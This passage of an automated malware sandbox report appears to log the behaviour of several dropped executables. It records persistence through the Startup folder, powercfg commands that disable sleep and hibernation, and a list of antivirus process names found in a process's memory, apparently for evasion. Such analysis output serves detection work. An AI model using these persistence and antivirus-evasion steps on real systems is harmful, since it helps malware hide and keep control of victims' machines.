                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exe VolumeInformation
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exe VolumeInformation
                          Source: C:\Users\user\AppData\Roaming\NzL6O1Q.exeQueries volume information: C:\Users\user\AppData\Roaming\NzL6O1Q.exe VolumeInformation
                          Source: C:\Users\user\AppData\Roaming\NzL6O1Q.exeQueries volume information: C:\Users\user\AppData\Roaming\NzL6O1Q.exe VolumeInformation
                          Source: C:\Users\user\AppData\Roaming\NzL6O1Q.exeQueries volume information: C:\Users\user\AppData\Roaming\NzL6O1Q.exe VolumeInformation
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E6CBEA GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,0_2_00E6CBEA
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                          Lowering of HIPS / PFW / Operating System Security Settings

                          barindex
                          Modifies power options to not sleep / hibernate
                          Source: C:\Users\user\AppData\Local\Temp\pcqxl.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                          Source: C:\Users\user\AppData\Local\Temp\pcqxl.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                          Source: C:\ProgramData\vhsqbqlujrwy\yklcfqtilcgt.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                          Source: C:\ProgramData\vhsqbqlujrwy\yklcfqtilcgt.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                          Source: C:\Users\user\AppData\Local\Temp\pcqxl.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                          Source: C:\Users\user\AppData\Local\Temp\pcqxl.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                          Source: C:\ProgramData\vhsqbqlujrwy\yklcfqtilcgt.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                          Source: C:\ProgramData\vhsqbqlujrwy\yklcfqtilcgt.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                          Source: svchost.exe, 00000035.00000002.3317977394.0000022087AF0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000003.2538212391.0000022087AEE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000003.2538561130.0000022087AEE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000003.2524405959.0000022087AEE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bdagent.exe
                          Source: svchost.exe, 00000035.00000002.3317977394.0000022087AF0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000003.2538212391.0000022087AEE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000003.2538561130.0000022087AEE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000003.2524405959.0000022087AEE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: cmdagent.exe
                          Source: svchost.exe, 00000035.00000002.3317977394.0000022087AF0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000003.2538212391.0000022087AEE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000003.2538561130.0000022087AEE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000003.2524405959.0000022087AEE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: avguard.exe
                          Source: svchost.exe, 00000035.00000002.3317977394.0000022087AF0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000003.2538212391.0000022087AEE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000003.2538561130.0000022087AEE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000003.2524405959.0000022087AEE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vsserv.exe
                          Source: svchost.exe, 00000035.00000002.3317977394.0000022087AF0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000003.2538212391.0000022087AEE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000003.2538561130.0000022087AEE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000003.2524405959.0000022087AEE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: avp.exe
                          Source: svchost.exe, 00000035.00000002.3317977394.0000022087AF0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000003.2538212391.0000022087AEE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000003.2538561130.0000022087AEE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000003.2524405959.0000022087AEE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 360safe.exe
                          Source: svchost.exe, 00000035.00000002.3317977394.0000022087AF0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000003.2538212391.0000022087AEE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000003.2538561130.0000022087AEE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000003.2524405959.0000022087AEE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: msmpeng.exe
                          Source: svchost.exe, 00000035.00000002.3317977394.0000022087AF0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000003.2538212391.0000022087AEE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000003.2538561130.0000022087AEE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000003.2524405959.0000022087AEE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ashdisp.exe
                          Source: svchost.exe, 00000035.00000002.3317977394.0000022087AF0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000003.2538212391.0000022087AEE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000003.2538561130.0000022087AEE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000003.2524405959.0000022087AEE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bullguard.exe
                          Source: svchost.exe, 00000035.00000002.3317977394.0000022087AF0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000003.2538212391.0000022087AEE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000003.2538561130.0000022087AEE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000003.2524405959.0000022087AEE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dwengine.exe
                          Source: svchost.exe, 00000035.00000002.3317977394.0000022087AF0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000003.2538212391.0000022087AEE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000003.2538561130.0000022087AEE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000003.2524405959.0000022087AEE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: k7tsmngr.exe
                          Source: svchost.exe, 00000035.00000002.3317977394.0000022087AF0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000003.2538212391.0000022087AEE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000003.2538561130.0000022087AEE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000003.2524405959.0000022087AEE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: mcshield.exe
                          Source: svchost.exe, 00000035.00000002.3317977394.0000022087AF0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000003.2538212391.0000022087AEE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000003.2538561130.0000022087AEE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000003.2524405959.0000022087AEE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: sbamsvc.exe
                          Source: svchost.exe, 00000035.00000002.3317977394.0000022087AF0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000003.2538212391.0000022087AEE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000003.2538561130.0000022087AEE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000003.2524405959.0000022087AEE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: avgnsx.exe
                          Source: e44fda3216.exe, e44fda3216.exe, 0000000B.00000003.2506934025.0000000005349000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2631938589.0000000005349000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2765743260.0000000000618000.00000004.00000020.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2789195144.0000000000627000.00000004.00000020.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2466989559.0000000005349000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2625395130.0000000000613000.00000004.00000020.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2772005516.0000000000622000.00000004.00000020.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2465911850.0000000000623000.00000004.00000020.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2476241959.0000000000623000.00000004.00000020.00020000.00000000.sdmp, NzL6O1Q.exe, 00000014.00000002.3342608524.000000001B72F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                          Source: svchost.exe, 00000035.00000003.2524405959.0000022087AA4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000002.3317977394.0000022087AAB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000003.2538561130.0000022087AA8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000003.2538212391.0000022087AA6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: procexp.exe
                          Source: svchost.exe, 00000035.00000002.3317977394.0000022087AF0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000003.2538212391.0000022087AEE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000003.2538561130.0000022087AEE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000003.2524405959.0000022087AEE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: savservice.exe
                          Source: svchost.exe, 00000035.00000002.3317977394.0000022087AF0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000003.2538212391.0000022087AEE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000003.2538561130.0000022087AEE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000003.2524405959.0000022087AEE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vsmon.exe
                          Source: svchost.exe, 00000035.00000002.3317977394.0000022087AF0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000003.2538212391.0000022087AEE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000003.2538561130.0000022087AEE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000003.2524405959.0000022087AEE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: a2service.exe
